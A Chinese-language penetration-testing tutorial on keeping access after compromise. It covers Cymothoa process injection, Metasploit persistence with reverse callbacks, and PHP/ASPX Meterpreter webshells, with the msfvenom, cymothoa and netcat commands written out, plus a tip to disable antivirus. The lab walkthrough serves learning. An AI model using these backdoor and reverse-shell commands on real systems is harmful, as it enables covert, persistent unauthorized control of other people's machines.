后渗透攻击:后门

在完成了提升权限后,我们就应该创建后门了,以维持对目标主机的控制权。这样一来,即使我们所利用的漏洞被补丁程序修复,还可以通过后门继续控制目标系统。

操作系统后门

1.Cymothoa后门

Cymothoa是一款可以将shellcode注入现有进程的后门工具,可以把shellcode伪装成常规程序

首先查看程序的PID(在linux系统下输入ps -aux命令,Windows系统下输入tasklist命令)
在Linux下
后渗透攻击:后门
在Windows下
后渗透攻击:后门

在使用Cymothoa时,需通过-p选项指定目标进程的PID,并通过-s选项指定shellcode的编号,shellcode的编号如图所示
后渗透攻击:后门

成功渗透目标主机后,就可以把Cymothoa的可执行程序复制到目标主机上,生成后门程序
例如使用PID为829的进程为宿主进程,选择第一类shellcode,指定payload服务端口为4444
cymothoa -p 829 -s 1 -y 4444

成功后连接目标主机后门
Nc -nvv 192.168.1.6 4444

Persistence后门

Persistence是一款使用安装自启动方式的持久性后门程序,可以利用它创建和注册文件。
首先输入run persistence -h查看所有用到的命令选项。

在此我已提前利用反弹型payload向对目标机进行渗透kali的payload的使用攻击之反弹型payload的使用
后渗透攻击:后门
创建后门
run persistence -A -S -i 60 -p 4321 -r 192.168.1.18
A:自动启动payload程序
S:系统启动时自动加载
U:用户登录时自动启动
X:开机时自动加载
i:回连的时间间隔
P:监听反向链接端口号
r:目标机器IP地址

后渗透攻击:后门
创建成功,输入session可查看已经创建成功的会话

**知识点:**这个脚本需要在目标机上创建文件从而触发杀毒软件,建议运行前关闭杀毒软件。

Web后门

Web后门泛指webshell,其实就是一段网页代码,包括ASP、ASP.NET、PHP、JSP等代码。

Web后门能够给攻击者提供很多功能,例如执行命令、浏览文件、辅助提权、执行SQL语句、反弹shell等。windoes系统下比较出名的莫过于“中国菜刀”还有很多代替“中国菜刀”的跨平台开源工具,例如“中国蚁剑”和cknife,均支持Mac,Windows和Linux。在kali下用的比较多的就是Weevely,Weevely支持的功能很强大,使用http头进行指令传输,唯一的缺点就是只支持PHP,其实metasploit框架中也自带了web后门,配合Meterpreter使用时,功能更强大。

1.Meterpreter后门

在metasploit中,有一个名为PHP Meterpreter的payload,利用这个可以创建具有Meterpreter功能的PHP webshell步骤如下所示:
1.使用msfvenom创建一个webshell.php
2.上传webshell.php到目标服务器
3.运行metasploit mulit-handler开始监听
4.访问webshell.php页面
5.获得反弹的metasploit shell

制作PHP Meterpreter
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.20 -f raw >111.php
-p:设置payload
-f:设置输出文件格式
后渗透攻击:后门
我在win7上搭建了phpstudy,将文件复制到phpstudy的www目录下
后渗透攻击:后门

启动msfconsole进行监听,配置以下命令
后渗透攻击:后门
在win7上访问该网站
后渗透攻击:后门

回到MSF下可以看到服务端已经反弹成功
后渗透攻击:后门

最后使用sysinfo和getuid等命令渗透目标主机

2.Aspx Meterpreter后门

在攻击中使用Aspx Meterpreter后门的步骤与PHP Meterpreter的大概相同
调用模块
后渗透攻击:后门
查看需要设置的参数
后渗透攻击:后门
设置攻击机IP
后渗透攻击:后门
设置端口
后渗透攻击:后门
输入generate -h查看帮助命令
后渗透攻击:后门
生成个版本的shellcode命令如下
generate -f asp 生成asp版的shellcode

generate -f aspx 生成aspx版的shellcode

在这里我们使用aspx版的shellcode
后渗透攻击:后门
将内容保存为222.aspx,上传到win7的phpstudy的www目录下
后渗透攻击:后门
设置监听
后渗透攻击:后门
在win7上访问该网站
后渗透攻击:后门
回到MSF下可以看到服务端已经反弹成功
后渗透攻击:后门
最后使用sysinfo和getuid等命令渗透目标主机

相关文章: